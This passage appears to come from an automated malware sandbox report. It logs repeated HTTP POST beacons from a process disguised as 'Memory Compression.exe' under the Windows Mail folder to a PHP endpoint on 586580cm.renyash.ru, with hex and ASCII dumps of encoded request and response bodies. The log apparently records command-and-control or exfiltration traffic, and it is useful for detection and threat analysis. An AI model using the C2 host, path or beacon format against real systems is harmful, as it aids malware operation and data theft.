                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3192&min_rtt=1520&rtt_var=3914&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=97999&cwnd=139&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                66192.168.2.550048104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:26.134753942 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:26.486223936 CET1060OUTData Raw: 5a 54 5d 5a 5f 5f 58 53 5c 5f 50 57 54 54 59 53 59 53 5b 5a 57 55 54 58 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZT]Z__XS\_PWTTYSYS[ZWUTX[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"%#,>2#1&57*)![) &S3.U(%+!>.^''P*!
                                                                                                                                Jan 11, 2025 15:03:26.583494902 CET25INHTTP/1.1 100 Continue


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                67192.168.2.550049104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:26.587100029 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:26.939459085 CET1776OUTData Raw: 5f 57 58 58 5a 5f 58 53 5c 5f 50 57 54 52 59 59 59 50 5b 5c 57 51 54 5f 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _WXXZ_XS\_PWTRYYYP[\WQT_[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"1?T?7[0 Y*9_+8'!:&32T(%?Y $(=;.^''P*
                                                                                                                                Jan 11, 2025 15:03:27.046070099 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:27.297183990 CET957INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E2h02OlFSeNu8%2B74%2F3Ig58GKWaOr5rmHpewbfT7JzVhAUlURGc788SbTT%2BGb1pYfuR81D%2FkLu0cidwj%2B43MKO9VtztZr67av0LIKwQBvHzERiCT2b90O7Z%2FPSnMOK3QCp%2BMkh0SQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 90057345c957c427-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3422&min_rtt=1499&rtt_var=4409&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=86451&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 58 21 2e 2a 12 22 28 25 0b 3e 1f 30 01 33 1e 31 5b 29 31 35 02 31 38 20 1e 2e 5e 2b 08 23 39 30 5d 24 2d 22 06 24 3e 31 0f 2b 11 2c 5d 00 10 23 40 30 1d 2d 58 2e 21 2d 1d 3e 32 24 40 22 3c 24 02 26 28 29 0f 34 55 2f 5a 34 3e 26 04 2f 57 23 53 2e 37 22 11 2e 5e 23 05 37 0f 2b 55 00 14 20 52 31 00 3c 1d 29 23 3b 0d 37 38 31 02 33 02 34 54 3d 12 2c 55 3d 01 3d 52 3f 12 21 0a 37 01 03 10 2a 23 27 1d 24 0c 2e 0f 25 16 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'X!.*"(%>031[)1518 .^+#90]$-"$>1+,]#@0-X.!->2$@"<$&()4U/Z4>&/W#S.7".^#7+U R1<)#;78134T=,U==R?!7*#'$.%!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                68192.168.2.550050104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:26.720880032 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:27.079929113 CET1060OUTData Raw: 5a 54 58 5e 5f 5d 5d 51 5c 5f 50 57 54 54 59 52 59 5c 5b 5c 57 51 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTX^_]]Q\_PWTTYRY\[\WQT\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X&3(\?T' "3%7=)+(, %'<.T+$67(=.^''P*!
                                                                                                                                Jan 11, 2025 15:03:27.169100046 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:27.410356045 CET808INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:27 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FJmhyFoHWvw%2Fy0fc9kaKU36ZGKGawWJrX2QvR3WKI4timtfXAJWJYhUC2n0%2FCWprgQU8GrSq%2Bif42SVA4GyIIh6MxQcPCX%2FsrlPw%2FxP5dxBYP6szxFj40gcESqzaEZLInNMXwiou"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573468dc9c360-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2293&min_rtt=1691&rtt_var=1839&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=224270&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                69192.168.2.550051104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:27.536483049 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:27.892461061 CET1060OUTData Raw: 5a 54 58 59 5f 59 58 52 5c 5f 50 57 54 57 59 5c 59 53 5b 5e 57 53 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTXY_YXR\_PWTWY\YS[^WST^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y20]>2<[#>Z$3>*!^)(0#_&V'W<<!'#V>.^''P*-
                                                                                                                                Jan 11, 2025 15:03:27.990235090 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:28.238454103 CET803INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:28 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=afCGgAkhW3cPBVN7Ep5igkUfUgTVvLmbeHI938%2BaQ05AxzgTw7Z3FTLy3PEku3hOYWBfh189QrhNCp5B9GexXA8HHvrL5SCBCWECfR65VrYYAHVTvGDnx%2Bb4KhBgMxTe%2BTPs%2B9We"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005734ba9788c33-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5096&min_rtt=1928&rtt_var=7060&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=53524&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                70192.168.2.550052104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:28.584292889 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:28.939376116 CET1060OUTData Raw: 5a 54 58 5a 5a 58 58 5d 5c 5f 50 57 54 52 59 5c 59 52 5b 59 57 53 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTXZZXX]\_PWTRY\YR[YWST\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"20(24#!Z$&3>9*;,U :*W$.W(457R*.^''P*
                                                                                                                                Jan 11, 2025 15:03:29.026242018 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:29.267090082 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:29 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FImfbI1377Yfj8xvM6I6jkKnMJj%2FOAveVg8%2BY8JPkcXYX5yrOB34aUjrxd1oa17MflbHFpWizJM4sKMjvrbx9HNLkxCsik3ea5HPf281gjOyLCNRB7%2FZ%2FCc%2BjG3uGNypK4gEAWmB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573522b3542ab-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2209&min_rtt=1642&rtt_var=1750&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=236207&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                71192.168.2.550053104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:29.395490885 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:29.751874924 CET1060OUTData Raw: 5a 50 58 5d 5f 5c 58 51 5c 5f 50 57 54 5c 59 53 59 54 5b 50 57 56 54 5e 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZPX]_\XQ\_PWT\YSYT[PWVT^[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!]% ,X+18Z 1^0C8="=4**V'%+&'Z"Q =;.^''P*
                                                                                                                                Jan 11, 2025 15:03:29.856921911 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:30.104336977 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=abaQyzhSyVnv5LXFjTaz9zcwfNIWUyWjPHM87dMxkyYECtW%2F0VzgbkDMykuEds4gOWQcbibtVago5T8yds4iIFL6d9Wmzb8JTyG5b81pKf9eAl%2BZguf6mIZOCbX9beK0%2BgwgRTTL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573575f71437e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3738&min_rtt=1719&rtt_var=4684&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=81664&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                72192.168.2.550054104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:30.239728928 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:30.596059084 CET1060OUTData Raw: 5a 57 5d 59 5f 5a 5d 54 5c 5f 50 57 54 53 59 5e 59 55 5b 5c 57 51 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZW]Y_Z]T\_PWTSY^YU[\WQTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!%$X<?4"50$*9]+837950?"S(^648>.^''P*=
                                                                                                                                Jan 11, 2025 15:03:30.683701038 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:30.936893940 CET806INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:30 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E0N3MUHwJM%2BjaLUT3pbxYrwyIHOoBy6qKLwdczGwEaM2q8MOzmf7HSF%2BcYsejj8HV8aVTQbCYJG%2B85BcSye2qLSWGXQDb2j%2BcioNPCWTby5obII10TDaCiF1TMRDsfeT%2BcxBbOxf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005735c8c7b435d-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2349&min_rtt=1810&rtt_var=1758&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=238250&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                73192.168.2.550055104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:31.293873072 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:31.643301964 CET1060OUTData Raw: 5f 5f 5d 59 5f 5a 5d 57 5c 5f 50 57 54 54 59 5e 59 53 5b 5c 57 55 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: __]Y_Z]W\_PWTTY^YS[\WUT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2 ^(/41%0%3*91[=?49.3>+7Z"(>.^''P*!
                                                                                                                                Jan 11, 2025 15:03:31.740817070 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:31.983639956 CET804INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:31 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DaRqw5OKxh4vF%2BNsBqAdGcwZXo3BoDbbYuZQTotkW1n9bh0%2BZKn4xPP80LjBAFM5IAwuV%2BFLdOUp9gSLzlrKxS2y22jlDvOIVfS0wot2BKS%2F4W9B9jjxEH6XAQDBnctff8MRzu4w"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005736319050f51-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8504&min_rtt=1630&rtt_var=14360&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=25782&cwnd=203&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                74192.168.2.550056104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:32.118451118 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                75192.168.2.550057104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:32.308197975 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1756
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:32.658101082 CET1756OUTData Raw: 5a 52 5d 5c 5f 5d 5d 50 5c 5f 50 57 54 57 59 5b 59 56 5b 5d 57 5e 54 5c 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZR]\_]]P\_PWTWY[YV[]W^T\[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X10 ^?"'453&3>><W!)=',"V<@?Z"7>;.^''P*-
                                                                                                                                Jan 11, 2025 15:03:32.781153917 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:32.948693037 CET957INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sIRTr0PpbWrVs%2BiVZ95mJ%2FViW3%2Fujn%2Fv13X%2Fvo5blyRTvwrwv8V4o3uQJkpqrHPcxpEZuWWLKNE1mXFcRmCKET5WHRuQK8DTU7k31xo4fOlFI0G4E7p4D90xi%2BtftedpNqQKSU9P"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573699e5d42cd-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8434&min_rtt=2099&rtt_var=13457&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2066&delivery_rate=27662&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
